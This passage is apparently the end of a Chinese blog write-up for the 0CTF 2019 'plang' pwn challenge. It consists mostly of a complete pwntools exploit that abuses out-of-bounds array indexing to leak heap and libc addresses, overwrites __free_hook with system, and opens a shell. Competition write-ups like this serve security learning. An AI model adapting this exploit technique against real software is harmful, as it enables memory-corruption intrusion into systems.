<p><strong>在对数组进行赋值时需要输入的是小数形式的字符串，而python默认的精度是完全达不到要求的，这里采用了decimal库，利用该库可以输出高精度的double类型。</strong></p>
<p>最终利用脚本如下，只在本地尝试（ubuntu 16.04），在不同版本下需要调整相应的参数，同时还需要编译一下用于数据转换的<code>helper.c</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> decimal</span><br><span class="line"></span><br><span class="line">p = <span class="keyword">None</span></span><br><span class="line">ph = <span class="keyword">None</span></span><br><span class="line">r = <span class="keyword">lambda</span> x:p.recv(x)</span><br><span class="line">rl = <span class="keyword">lambda</span>:p.recvline</span><br><span class="line">ru = <span class="keyword">lambda</span> x:p.recvuntil(x)</span><br><span class="line">rud = <span class="keyword">lambda</span> x:p.recvuntil(x,drop=<span class="keyword">True</span>)</span><br><span class="line">s = <span class="keyword">lambda</span> x:p.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x:p.sendline(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y:p.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y:p.sendafter(x,y)</span><br><span class="line">rn = <span class="keyword">lambda</span> x:p.recvn(x)</span><br><span class="line"></span><br><span class="line"><span class="comment"># create a new context for this task</span></span><br><span class="line">ctx = decimal.Context()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">float_to_str</span><span class="params">(f)</span>:</span></span><br><span class="line">	<span class="string">"""</span></span><br><span class="line"><span class="string">	Convert the given float to a string,</span></span><br><span class="line"><span class="string">	without resorting to scientific notation</span></span><br><span class="line"><span class="string">	"""</span></span><br><span class="line">	d1 = ctx.create_decimal(f)</span><br><span class="line">	<span class="keyword">return</span> format(d1, <span class="string">'f'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">writeany</span><span class="params">(addr,value)</span>:</span></span><br><span class="line">	ph.sendlineafter(<span class="string">'choice:\n'</span>,str(<span class="number">2</span>))</span><br><span class="line">	ph.sendlineafter(<span class="string">'input:\n'</span>,str(addr<span class="number">-8</span>))</span><br><span class="line">	pl_data = ph.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	info(<span class="string">'&#123;&#125; --&gt;double: &#123;&#125;'</span>.format(hex(addr<span class="number">-8</span>),pl_data))</span><br><span class="line">	payload = <span class="string">'c[-0x2e] = '</span>+float_to_str(pl_data)</span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line"></span><br><span class="line">	ph.sendlineafter(<span class="string">'choice:\n'</span>,str(<span class="number">2</span>))</span><br><span class="line">	ph.sendlineafter(<span class="string">'input:\n'</span>,str(value))</span><br><span class="line">	pl_data = ph.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	info(<span class="string">'&#123;&#125; --&gt;double: &#123;&#125;'</span>.format(hex(value),pl_data))</span><br><span class="line">	payload = <span class="string">'b[0] = '</span>+float_to_str(pl_data)</span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">global</span> p</span><br><span class="line">	<span class="keyword">global</span> ph</span><br><span class="line">	BIN_PATH = <span class="string">'./plang'</span></span><br><span class="line">	DEBUG = <span class="number">1</span></span><br><span class="line">	ATTACH = <span class="number">0</span></span><br><span class="line">	context.arch = <span class="string">'amd64'</span></span><br><span class="line">	ph = process(<span class="string">'./help'</span>)</span><br><span class="line">	<span class="keyword">if</span> DEBUG == <span class="number">1</span>:</span><br><span class="line">		p = process(BIN_PATH)</span><br><span class="line">		elf = ELF(BIN_PATH)</span><br><span class="line">		context.log_level = <span class="string">'debug'</span></span><br><span class="line">		context.terminal = [<span class="string">'tmux'</span>, <span class="string">'split'</span>, <span class="string">'-h'</span>]</span><br><span class="line">		<span class="keyword">if</span> context.arch == <span class="string">'amd64'</span>:</span><br><span class="line">			libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			libc = ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>)</span><br><span class="line">			</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		p = remote(<span class="string">'chall.pwnable.tw'</span>,<span class="number">10201</span>)</span><br><span class="line">		<span class="comment"># libc = ELF('./libc_32.so.6')</span></span><br><span class="line">		context.log_level = <span class="string">'info'</span></span><br><span class="line"></span><br><span class="line">	payload = <span class="string">'var a = "This is a PoC!a"'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	payload = <span class="string">'System.print(a)'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	payload = <span class="string">'var b = [1, 2, 3]'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	payload = <span class="string">'var c = [1, 2, 3]'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	<span class="comment"># b's addr: 0x5555557855e0</span></span><br><span class="line">	payload = <span class="string">'b[-0x662] = a'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line"></span><br><span class="line">	<span class="comment"># leak heap addr</span></span><br><span class="line">	heap_addr = <span class="string">''</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">8</span>,<span class="number">15</span>):</span><br><span class="line">		payload = <span class="string">'System.print(a.byteAt_(&#123;&#125;))'</span>.format(i)</span><br><span class="line">		ru(<span class="string">'&gt; '</span>)</span><br><span class="line">		sl(payload)</span><br><span class="line">		heap_addr += chr(int(ru(<span class="string">'\n'</span>)[:<span class="number">-1</span>]))</span><br><span class="line">	heap_addr = u64(heap_addr.ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">	log.info(<span class="string">'heap_addr:'</span>+hex(heap_addr))</span><br><span class="line"></span><br><span class="line">	heap_base = heap_addr-(<span class="number">0x55555577efa0</span><span class="number">-0x0000555555773000</span>)</span><br><span class="line">	info(<span class="string">'heap_base:'</span>+hex(heap_base))</span><br><span class="line"></span><br><span class="line">	<span class="comment"># leak libc addr</span></span><br><span class="line">	<span class="comment"># target addr:0x5555557741c0--&gt;0x7ffff7ac8b78(main_arena+88)</span></span><br><span class="line">	ph.sendlineafter(<span class="string">'choice:\n'</span>,str(<span class="number">2</span>))</span><br><span class="line">	ph.sendlineafter(<span class="string">'input:\n'</span>,str(<span class="number">4</span>))</span><br><span class="line">	pl_data = ph.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	info(<span class="string">'4--&gt;double:'</span>+pl_data)</span><br><span class="line">	payload = <span class="string">'b[-0x1143] = '</span>+float_to_str(pl_data)</span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	<span class="comment"># c's addr: 0x5555557858a0</span></span><br><span class="line">	<span class="comment"># b's buffer_ptr: 0x5555557855c0</span></span><br><span class="line">	ph.sendlineafter(<span class="string">'choice:\n'</span>,str(<span class="number">2</span>))</span><br><span class="line">	ph.sendlineafter(<span class="string">'input:\n'</span>,str(heap_base+(<span class="number">0x5555557741b8</span><span class="number">-0x555555773000</span>)))</span><br><span class="line">	pl_data = ph.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	info(<span class="string">'4--&gt;double:'</span>+pl_data)</span><br><span class="line">	payload = <span class="string">'c[-0x2e] = '</span>+float_to_str(pl_data)</span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	</span><br><span class="line">	payload=<span class="string">'System.print(b[0])'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	libc_addr = ru(<span class="string">'\n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">	ph.sendlineafter(<span class="string">'choice:\n'</span>,str(<span class="number">1</span>))</span><br><span class="line">	ph.sendlineafter(<span class="string">'input:\n'</span>,libc_addr)</span><br><span class="line">	libc_addr = int(ph.recvuntil(<span class="string">'\n'</span>)[:<span class="number">-1</span>],<span class="number">16</span>)</span><br><span class="line">	info(<span class="string">'libc addr:'</span>+hex(libc_addr))</span><br><span class="line">	libc_base = (libc_addr&amp;<span class="number">0xFFFFFFFFFFFFF000</span>)-(<span class="number">0x00007ffff7ac8000</span><span class="number">-0x00007ffff7704000</span>)</span><br><span class="line">	info(<span class="string">'libc base:'</span>+hex(libc_base))</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ATTACH==<span class="number">1</span>:</span><br><span class="line">		gdb.attach(p,<span class="string">'''</span></span><br><span class="line"><span class="string">		b *0x555555554000+0x104a6</span></span><br><span class="line"><span class="string">		b *0x555555554000+0x10496</span></span><br><span class="line"><span class="string">		'''</span>)</span><br><span class="line"></span><br><span class="line">	<span class="comment"># write __free_hook</span></span><br><span class="line">	<span class="comment"># c's buffer_ptr: 0x00005555557858a0</span></span><br><span class="line"></span><br><span class="line">	freehook_addr = libc_base+libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">	system_addr = libc_base+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">	writeany(freehook_addr,system_addr) </span><br><span class="line">	value = u64(<span class="string">'sh\x00'</span>.ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">	writeany(heap_base+(<span class="number">0x5555557858a0</span><span class="number">-0x555555773000</span>),value)</span><br><span class="line"></span><br><span class="line">	payload = <span class="string">'c.clear()'</span></span><br><span class="line">	sla(<span class="string">'&gt; '</span>,payload)</span><br><span class="line">	</span><br><span class="line">	p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	pwn()</span><br></pre></td></tr></table></figure>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://changochen.github.io/2019-03-23-0ctf-2019.html" target="_blank" rel="noopener">https://changochen.github.io/2019-03-23-0ctf-2019.html</a></p>
<p><a href="https://codeday.me/bug/20171224/112503.html" target="_blank" rel="noopener">https://codeday.me/bug/20171224/112503.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
            <a href="/tags/js/" rel="tag"># js</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/26/bctf2018/bctf/" rel="next" title="bctf-两道tcache题解">
                <i class="fa fa-chevron-left"></i> bctf-两道tcache题解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/09/IoT/arm固件加载地址/" rel="prev" title="ARM固件加载基址">
                ARM固件加载基址 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">e3pem</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/e3pem" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i></a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:ymyushouxi@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i></a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://p4nda.top/" title="P4nda" target="_blank">P4nda</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sunichi.github.io/" title="Sunichi" target="_blank">Sunichi</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ble55ing.github.io/" title="Ble55ing" target="_blank">Ble55ing</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://p1umer.github.io/" title="P1umer" target="_blank">P1umer</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ama2in9.top/" title="Ama2in9" target="_blank">Ama2in9</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xiaoxiaorenwu.top/" title="xiaoxiaorenwu" target="_blank">xiaoxiaorenwu</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0ctf2019-plang题解"><span class="nav-number">1.</span> <span class="nav-text">0ctf2019-plang题解</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#基本信息"><span class="nav-number">1.1.</span> <span class="nav-text">基本信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析存储的结构体"><span class="nav-number">1.2.</span> <span class="nav-text">分析存储的结构体</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#结构体验证"><span class="nav-number">1.2.1.</span> <span class="nav-text">结构体验证</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#泄露堆地址部分"><span class="nav-number">1.3.</span> <span class="nav-text">泄露堆地址部分</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解决数据转换问题"><span class="nav-number">1.4.</span> <span class="nav-text">解决数据转换问题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#泄露libc地址"><span class="nav-number">1.5.</span> <span class="nav-text">泄露libc地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#任意地址写"><span class="nav-number">1.6.</span> <span class="nav-text">任意地址写</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞利用"><span class="nav-number">1.7.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考链接"><span class="nav-number">1.8.</span> <span class="nav-text">参考链接</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">e3pem</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
